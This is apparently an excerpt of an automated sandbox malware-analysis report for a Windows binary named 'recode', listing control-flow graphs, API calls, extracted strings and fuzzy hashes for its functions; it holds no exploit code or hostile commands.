7ff7580357a1-7ff7580357a4 1804->1808 1809 7ff7580356fe-7ff758035701 1805->1809 1806->1809 1807->1795 1808->1807 1810 7ff7580357a6-7ff7580357cc log * 2 1808->1810 1811 7ff75803570e-7ff758035711 1809->1811 1812 7ff758035703 1809->1812 1810->1795 1814 7ff758035713-7ff75803575f log * 2 1811->1814 1815 7ff758035764-7ff75803579a log * 2 1811->1815 1812->1811 1813 7ff758035705-7ff758035709 1812->1813 1813->1795 1814->1795 1815->1795
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1fa9e0eac6b441efac26cb2a2d27cd8c87292bb3963f74377fa5a87c8dc7d2ff
                            • Instruction ID: 3611135298ce61d96da090c9a151671f4582e306b866d9a600fa79627789caa4
                            • Opcode Fuzzy Hash: 1fa9e0eac6b441efac26cb2a2d27cd8c87292bb3963f74377fa5a87c8dc7d2ff
                            • Instruction Fuzzy Hash: 93B1F512E59BCD43E413A23692027B5D2562F7B3C2D9CD732F94E315F29F2C718A8524

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1816 7ff75802e7e0-7ff75802e8c5 1817 7ff75802e8c7-7ff75802e8ce 1816->1817 1818 7ff75802e8d0-7ff75802e8d8 sqrtf 1816->1818 1819 7ff75802e8db-7ff75802e8ef 1817->1819 1818->1819 1820 7ff75802e8fa-7ff75802e8fd sqrtf 1819->1820 1821 7ff75802e8f1-7ff75802e8f8 1819->1821 1822 7ff75802e902-7ff75802e91c 1820->1822 1821->1822 1823 7ff75802e928-7ff75802e92c sqrtf 1822->1823 1824 7ff75802e91e-7ff75802e926 1822->1824 1825 7ff75802e931-7ff75802e94b 1823->1825 1824->1825 1826 7ff75802e957-7ff75802e95b sqrtf 1825->1826 1827 7ff75802e94d-7ff75802e955 1825->1827 1828 7ff75802e960-7ff75802e976 1826->1828 1827->1828 1829 7ff75802e97c-7ff75802e998 1828->1829 1830 7ff75802ec35-7ff75802ec78 1828->1830 1831 7ff75802e9a0-7ff75802e9a4 1829->1831 1832 7ff75802e9aa-7ff75802eb4a call 7ff75802e7e0 1831->1832 1833 7ff75802ec05-7ff75802ec08 1831->1833 1839 7ff75802eb4c-7ff75802eb53 1832->1839 1840 7ff75802eb55-7ff75802eb5d sqrtf 1832->1840 1835 7ff75802ec2a 1833->1835 1836 7ff75802ec0a-7ff75802ec24 1833->1836 1838 7ff75802ec2c 1835->1838 1836->1835 1838->1830 1841 7ff75802eb60-7ff75802eb76 1839->1841 1840->1841 1842 7ff75802eb78-7ff75802eb80 1841->1842 1843 7ff75802eb82-7ff75802eb86 sqrtf 1841->1843 1844 7ff75802eb8b-7ff75802eba5 1842->1844 1843->1844 1845 7ff75802eba7-7ff75802ebaf 1844->1845 1846 7ff75802ebb1-7ff75802ebb5 sqrtf 1844->1846 1847 7ff75802ebba-7ff75802ebd2 1845->1847 1846->1847 1848 7ff75802ebdd-7ff75802ebe0 sqrtf 1847->1848 1849 7ff75802ebd4-7ff75802ebdb 1847->1849 1850 7ff75802ebe5-7ff75802ebfd 1848->1850 1849->1850 1850->1831 1851 7ff75802ec03 1850->1851 1851->1838
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID: sqrtf
                            • String ID:
                            • API String ID: 321154650-0
                            • Opcode ID: 6597534efcc2c3714991107cf66fced44d23304f2a521e9887f7ae15d6bc5a01
                            • Instruction ID: 9e250dc568f479837ae9cf6549acddd8aa7e85c4c0225f987e86df2a230dff3a
                            • Opcode Fuzzy Hash: 6597534efcc2c3714991107cf66fced44d23304f2a521e9887f7ae15d6bc5a01
                            • Instruction Fuzzy Hash: 37B1D622E38BCC81E223A63750821F6E250AFBF3C5F2DDB23FD88356B29B6561D55550
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ee073dee94c04a44e8f8235924cbda74032be01d3e9cf976116d4a3b1496ccba
                            • Instruction ID: dfdfe97383bf1051347bb4fb851d9e99e16355fc8910daa6532d5565d7ade88b
                            • Opcode Fuzzy Hash: ee073dee94c04a44e8f8235924cbda74032be01d3e9cf976116d4a3b1496ccba
                            • Instruction Fuzzy Hash: 2591D311E58BCD86E463A23692037B6E2951FBF3C1E6CD732B94D305F2AF5870D68524
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 574755d9cc077f980329cd5b665864c88a4d021959cc6a5c207300baa26420f4
                            • Instruction ID: fb48ac89ad2f59b9665b5f24cc57bf2657b6ae8397a001108d6317aad6a7b2b4
                            • Opcode Fuzzy Hash: 574755d9cc077f980329cd5b665864c88a4d021959cc6a5c207300baa26420f4
                            • Instruction Fuzzy Hash: 5C819202E18FCE82F2A3623651436BCE2815FBE285E6C9733F95D341E29F5836D94528
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID: Clipboard$ByteCharCloseGlobalMultiWide$DataLockOpenUnlock
                            • String ID:
                            • API String ID: 846020896-0
                            • Opcode ID: 15b2c5fe949820354eb95b061dab0a2a901fb8ed63ae8888e6322d3350e99280
                            • Instruction ID: 7f1a3e4bc60cb71ff27923a1a739e80040f249e00d59191e10e1449ca16c519a
                            • Opcode Fuzzy Hash: 15b2c5fe949820354eb95b061dab0a2a901fb8ed63ae8888e6322d3350e99280
                            • Instruction Fuzzy Hash: EE316136B09B8283E710AF66B84016AF7E4FB88B94F880535DE5D07BA4DF3CD5858624
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID: memmove$strncmp
                            • String ID: #SCROLLY
                            • API String ID: 303274685-1064663049
                            • Opcode ID: 5a0e0f298f2dd093e4b73bf532ccdd54c358084836e35d5c22dc181f5d3529cb
                            • Instruction ID: 495ae6ed3362f6795fbebdca21ea26e61e22eefbd846d2c54f6e4bb998f5c419
                            • Opcode Fuzzy Hash: 5a0e0f298f2dd093e4b73bf532ccdd54c358084836e35d5c22dc181f5d3529cb
                            • Instruction Fuzzy Hash: DF531232A182998BE751EB36C2446BEF7A4EF59344F8D4235EA4C536D1DF38E848CB14
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID: ControlDevice$cosfsinf
                            • String ID:
                            • API String ID: 726333414-0
                            • Opcode ID: 13c68578b892d25337b03ab1f1b7ad126d5e0d55bfa98519080dd7bec264f488
                            • Instruction ID: ec27e7b9a668f08c5f69f694a31ad7d6df60bc823bf8d639d7ee51efb9477e9a
                            • Opcode Fuzzy Hash: 13c68578b892d25337b03ab1f1b7ad126d5e0d55bfa98519080dd7bec264f488
                            • Instruction Fuzzy Hash: 7AD10D32D18FC946E213AB3550526B6E364BF7F3C4F599322F94D71A62EF28A0D68710
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2c2ac79c62ee882e2b6028e7dbf2aac47853f2b2d864fc6e3e79028a6972f3e8
                            • Instruction ID: 2a89a00fe0db83435f6d993c0092f90fea8186437cc32b0e4fdaec448932ceb3
                            • Opcode Fuzzy Hash: 2c2ac79c62ee882e2b6028e7dbf2aac47853f2b2d864fc6e3e79028a6972f3e8
                            • Instruction Fuzzy Hash: 8081B002D58FCD86F163723641426F9E2946FBB2C5EAD9723BC5E744F2AF1930DA4128
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID: memmove
                            • String ID: $0$alpha$hue
                            • API String ID: 2162964266-2938412065
                            • Opcode ID: f95b763d151dba84a953fe7dac34313d52570f101f61a4ee480b44ff3a740008
                            • Instruction ID: 898f65ee6bd3e2a8f71a6ec104c1589f55ae29a0078d663adab8ec2f90a2b658
                            • Opcode Fuzzy Hash: f95b763d151dba84a953fe7dac34313d52570f101f61a4ee480b44ff3a740008
                            • Instruction Fuzzy Hash: 89B2E333E18B858BE311EB37D4411ADF360FF59388F589725EA4C625E6DF38A4889B14
                            APIs
                            Strings
                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00007FF75805DD2B
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID: DebugDebuggerErrorLastOutputPresentStringmemset
                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                            • API String ID: 1848478996-631824599
                            • Opcode ID: e844b6f9e12aeed2afcab9d86a22819ee04982e1adce84078b275c4046463b94
                            • Instruction ID: 4c56d696145fb83d864825324ce87031c299e5e9442730e5c156f31d843d0cad
                            • Opcode Fuzzy Hash: e844b6f9e12aeed2afcab9d86a22819ee04982e1adce84078b275c4046463b94
                            • Instruction Fuzzy Hash: FC114C32B14B8293F754AB22D6443B9F3A4FF44345F884535CA4D42A95EF3CE4A8C728
                            APIs
                            • memmove.VCRUNTIME140 ref: 00007FF75801473E
                              • Part of subcall function 00007FF758028460: acosf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF7580284D4
                              • Part of subcall function 00007FF758028460: ceilf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF7580284E3
                              • Part of subcall function 00007FF758028460: cosf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF758028535
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID: acosfceilfcosfmemmove
                            • String ID: (Auto-disabled ImGuiDebugLogFlags_EventClipper to avoid spamming)$Debug##Default$NewFrame(): ClearActiveID() because it isn't marked alive anymore!$gfff
                            • API String ID: 3642441648-2113471822
                            • Opcode ID: 32b5e8ad24c3b9d0c80a19e7b11250912477da1240351b5aff254f968c3453a4
                            • Instruction ID: e0c62fe30fe3d09518cdc1a839d1bb71da992a3399702250af146bfa5c2e2acd
                            • Opcode Fuzzy Hash: 32b5e8ad24c3b9d0c80a19e7b11250912477da1240351b5aff254f968c3453a4
                            • Instruction Fuzzy Hash: EC920532A04AC68BE755EF35D8402B9F7A1EF55B54F8C8236CA4D5B2E4EF38E0448764
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID: memcmpmemmove
                            • String ID:
                            • API String ID: 1261870273-0
                            • Opcode ID: 37ec01ecd31d47f630f486a3ee38776845baca789d607b860b8d783d4d5bb774
                            • Instruction ID: f041451d359a1469f9c69ba6f6fd642c70e5b996df366d7d04d4128feeee4b43
                            • Opcode Fuzzy Hash: 37ec01ecd31d47f630f486a3ee38776845baca789d607b860b8d783d4d5bb774
                            • Instruction Fuzzy Hash: 57F1BC72B00B858BEB10DF29C4847ADB3A4FB48B88F459226CE5E57784DF78E585C354
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID: memmovememset
                            • String ID: #MOVE
                            • API String ID: 1288253900-3098322713
                            • Opcode ID: e790beed1c877c6dbc7c87161f1447eb7ee856dac1d6d4db1f567ba9b5feca7f
                            • Instruction ID: 198b34e29ea8c46190afb1fe1895212fd35aee87afdc7f238410295b47b154e1
                            • Opcode Fuzzy Hash: e790beed1c877c6dbc7c87161f1447eb7ee856dac1d6d4db1f567ba9b5feca7f
                            • Instruction Fuzzy Hash: B9E15072606B819AD758DF29E9447A8B7A8F704B54FAC4239C7AC073A0DF35E076C718
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID: CreateThread_invalid_parameter_noinfo_noreturn
                            • String ID: :$S2345678
                            • API String ID: 2430190256-776604456
                            • Opcode ID: b3de1c8e70cdef13a6ede55855075978fc1f2f30870408cdd77b418e00acc506
                            • Instruction ID: 6f1c51eead752471d13d9ee01c88105206f64049b943523429b81f339d571ea6
                            • Opcode Fuzzy Hash: b3de1c8e70cdef13a6ede55855075978fc1f2f30870408cdd77b418e00acc506
                            • Instruction Fuzzy Hash: F6A12D22E18B928BF702E77594412BCE760AF53784F988336EE5C32AD5EF39A545C314
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID: memmovesqrtf
                            • String ID:
                            • API String ID: 1859266664-0
                            • Opcode ID: f135f61782b82863bed2159e243d1ad8e45a247cf0736b8aa110420540564d04
                            • Instruction ID: 6218f5acd127551e9fcf0650b0011eb958ef0e869f1643e617b62938a33f76cc
                            • Opcode Fuzzy Hash: f135f61782b82863bed2159e243d1ad8e45a247cf0736b8aa110420540564d04
                            • Instruction Fuzzy Hash: C162AD13E287E846E3129736508227AF791AF6E784F1DC723FD49A66A1DB3DE452C700
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID: memmovememset
                            • String ID: Processed$Remaining
                            • API String ID: 1288253900-3602939160
                            • Opcode ID: a202173382056f6968939bb1155a78b99caf73d854b9cf65573903230dc7c6d5
                            • Instruction ID: a22b4cc889cca35c81352dfb0eedb689864521c67f89dc513adef340d03643e8
                            • Opcode Fuzzy Hash: a202173382056f6968939bb1155a78b99caf73d854b9cf65573903230dc7c6d5
                            • Instruction Fuzzy Hash: 98F13772A082C14BD7259F25D95037AF7A0EB96728F9C4235DE8D076C4EB3CE548CB64
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: bb4e862473466c8cb84ea1cb16154531e9bb377cae74c09d4127e5031e472f26
                            • Instruction ID: 3e5515e3b18293d825c6a159ba4f7822700675c55e959bdbbe7b97adca8658fb
                            • Opcode Fuzzy Hash: bb4e862473466c8cb84ea1cb16154531e9bb377cae74c09d4127e5031e472f26
                            • Instruction Fuzzy Hash: 60A12501E18B8D42F413A23B5102AB5D2461F7B3C0EACD733E96E316D1EF2DB1DA5518
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID: powf
                            • String ID:
                            • API String ID: 3445610689-0
